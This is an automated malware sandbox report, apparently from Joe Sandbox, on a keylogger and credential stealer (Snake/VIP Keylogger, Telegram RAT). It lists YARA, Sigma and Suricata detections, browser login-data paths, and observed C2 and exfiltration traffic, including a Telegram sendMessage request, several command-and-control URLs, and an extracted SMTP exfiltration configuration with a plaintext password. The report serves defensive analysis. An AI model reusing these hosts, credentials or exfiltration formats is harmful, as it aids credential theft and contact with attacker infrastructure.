1.2.svchost.exe.5970f20.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.svchost.exe.5970f20.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34a61:$a1: get_encryptedPassword 0x34a35:$a2: get_encryptedUsername 0x34af9:$a3: get_timePasswordChanged 0x34a11:$a4: get_passwordField 0x34a77:$a5: set_encryptedPassword 0x34844:$a7: get_logins 0x30161:$a10: KeyLoggerEventArgs 0x30130:$a11: KeyLoggerEventArgsEventHandler 0x34918:$a13: _encryptedPassword
1.2.svchost.exe.5970f20.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e7ac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3de4f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e0ac:$a4: \Orbitum\User Data\Default\Login Data 0x3ea8b:$a5: \Kometa\User Data\Default\Login Data
1.2.svchost.exe.5970f20.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x325e4:$s1: UnHook 0x32580:$s2: SetHook 0x325b9:$s3: CallNextHook 0x32548:$s4: _hook
1.2.svchost.exe.3574f2e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.3574f2e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.svchost.exe.3574f2e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.svchost.exe.3574f2e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34a61:$a1: get_encryptedPassword 0x34a35:$a2: get_encryptedUsername 0x34af9:$a3: get_timePasswordChanged 0x34a11:$a4: get_passwordField 0x34a77:$a5: set_encryptedPassword 0x34844:$a7: get_logins 0x30161:$a10: KeyLoggerEventArgs 0x30130:$a11: KeyLoggerEventArgsEventHandler 0x34918:$a13: _encryptedPassword
1.2.svchost.exe.3574f2e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e7ac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3de4f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e0ac:$a4: \Orbitum\User Data\Default\Login Data 0x3ea8b:$a5: \Kometa\User Data\Default\Login Data
1.2.svchost.exe.3574f2e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x325e4:$s1: UnHook 0x32580:$s2: SetHook 0x325b9:$s3: CallNextHook 0x32548:$s4: _hook
1.3.svchost.exe.346df20.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.3.svchost.exe.346df20.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.3.svchost.exe.346df20.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.3.svchost.exe.346df20.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34a61:$a1: get_encryptedPassword 0x34a35:$a2: get_encryptedUsername 0x34af9:$a3: get_timePasswordChanged 0x34a11:$a4: get_passwordField 0x34a77:$a5: set_encryptedPassword 0x34844:$a7: get_logins 0x30161:$a10: KeyLoggerEventArgs 0x30130:$a11: KeyLoggerEventArgsEventHandler 0x34918:$a13: _encryptedPassword
1.3.svchost.exe.346df20.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e7ac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3de4f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e0ac:$a4: \Orbitum\User Data\Default\Login Data 0x3ea8b:$a5: \Kometa\User Data\Default\Login Data
1.3.svchost.exe.346df20.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x325e4:$s1: UnHook 0x32580:$s2: SetHook 0x325b9:$s3: CallNextHook 0x32548:$s4: _hook
1.2.svchost.exe.5970000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.5970000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.svchost.exe.5970000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.svchost.exe.5970000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33b81:$a1: get_encryptedPassword 0x33b55:$a2: get_encryptedUsername 0x33c19:$a3: get_timePasswordChanged 0x33b31:$a4: get_passwordField 0x33b97:$a5: set_encryptedPassword 0x33964:$a7: get_logins 0x2f281:$a10: KeyLoggerEventArgs 0x2f250:$a11: KeyLoggerEventArgsEventHandler 0x33a38:$a13: _encryptedPassword
1.2.svchost.exe.5970000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d8cc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cf6f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d1cc:$a4: \Orbitum\User Data\Default\Login Data 0x3dbab:$a5: \Kometa\User Data\Default\Login Data
1.2.svchost.exe.5970000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31704:$s1: UnHook 0x316a0:$s2: SetHook 0x316d9:$s3: CallNextHook 0x31668:$s4: _hook
Click to see the 70 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\8JVG9KELay.exe", CommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", ParentImage: C:\Users\user\Desktop\8JVG9KELay.exe, ParentProcessId: 8404, ParentProcessName: 8JVG9KELay.exe, ProcessCommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", ProcessId: 8432, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\8JVG9KELay.exe", CommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", ParentImage: C:\Users\user\Desktop\8JVG9KELay.exe, ParentProcessId: 8404, ParentProcessName: 8JVG9KELay.exe, ProcessCommandLine: "C:\Users\user\Desktop\8JVG9KELay.exe", ProcessId: 8432, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:24:06.667248+0100	2803305	3	Unknown Traffic	192.168.2.5	49695	104.21.80.1	443	TCP
2025-03-07T15:24:09.792052+0100	2803305	3	Unknown Traffic	192.168.2.5	49697	104.21.80.1	443	TCP
2025-03-07T15:24:18.829974+0100	2803305	3	Unknown Traffic	192.168.2.5	49704	104.21.80.1	443	TCP
2025-03-07T15:24:21.873192+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:24:00.890681+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49693	158.101.44.242	80	TCP
2025-03-07T15:24:04.328176+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49693	158.101.44.242	80	TCP
2025-03-07T15:24:07.328169+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49696	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:24:31.633396+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49711	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8JVG9KELay.exe

Avira: detected

Found malware configuration

Source: 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "nykenyer@nykenyer.hu", "Password": "VC0wEHu9F4", "Host": "mail.nykenyer.hu", "Port": "587"}
Source: 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "nykenyer@nykenyer.hu", "Password": "VC0wEHu9F4", "Host": "mail.nykenyer.hu", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: 8JVG9KELay.exe	Virustotal: Detection: 62%			Perma Link
Source: 8JVG9KELay.exe	ReversingLabs: Detection: 65%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 1.3.svchost.exe.346d000.0.raw.unpack	String decryptor: nykenyer@nykenyer.hu
Source: 1.3.svchost.exe.346d000.0.raw.unpack	String decryptor: VC0wEHu9F4
Source: 1.3.svchost.exe.346d000.0.raw.unpack	String decryptor: mail.nykenyer.hu
Source: 1.3.svchost.exe.346d000.0.raw.unpack	String decryptor: lion-office@protonmail.com
Source: 1.3.svchost.exe.346d000.0.raw.unpack	String decryptor: 587
Source: 1.3.svchost.exe.346d000.0.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 8JVG9KELay.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49694 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

Source:	Binary string: _.pdb source: svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 8JVG9KELay.exe, 00000000.00000003.1314641117.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, 8JVG9KELay.exe, 00000000.00000003.1318110678.00000000036B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 8JVG9KELay.exe, 00000000.00000003.1314641117.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, 8JVG9KELay.exe, 00000000.00000003.1318110678.00000000036B0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00844696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00844696
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0084C9C7
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084C93C FindFirstFileW,FindClose,	0_2_0084C93C
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0084F200
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0084F35D
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0084F65E
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00843A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00843A2B
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00843D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00843D4E
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0084BF27

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AEAACh	1_2_087AE800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AD09Ch	1_2_087ACDF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AEF04h	1_2_087AEC58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_087A0040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AF35Ch	1_2_087AF0B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AFC0Ch	1_2_087AF960
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AF7B4h	1_2_087AF508
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087A3326h	1_2_087A3254
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AD4F4h	1_2_087AD248
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087ADDA4h	1_2_087ADAF8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087A3326h	1_2_087A2EF8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087A2954h	1_2_087A26A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AD94Ch	1_2_087AD6A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AE1FCh	1_2_087ADF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087A0D10h	1_2_087A0B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087A16FBh	1_2_087A0B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087A3326h	1_2_087A2F08
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 087AE654h	1_2_087AE3A8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49711 -> 149.154.167.220:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 158.101.44.242 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.80.1 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:32:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226546%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49696 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49695 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49697 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49694 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_008525E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_008525E2

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:32:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226546%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:24:31 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
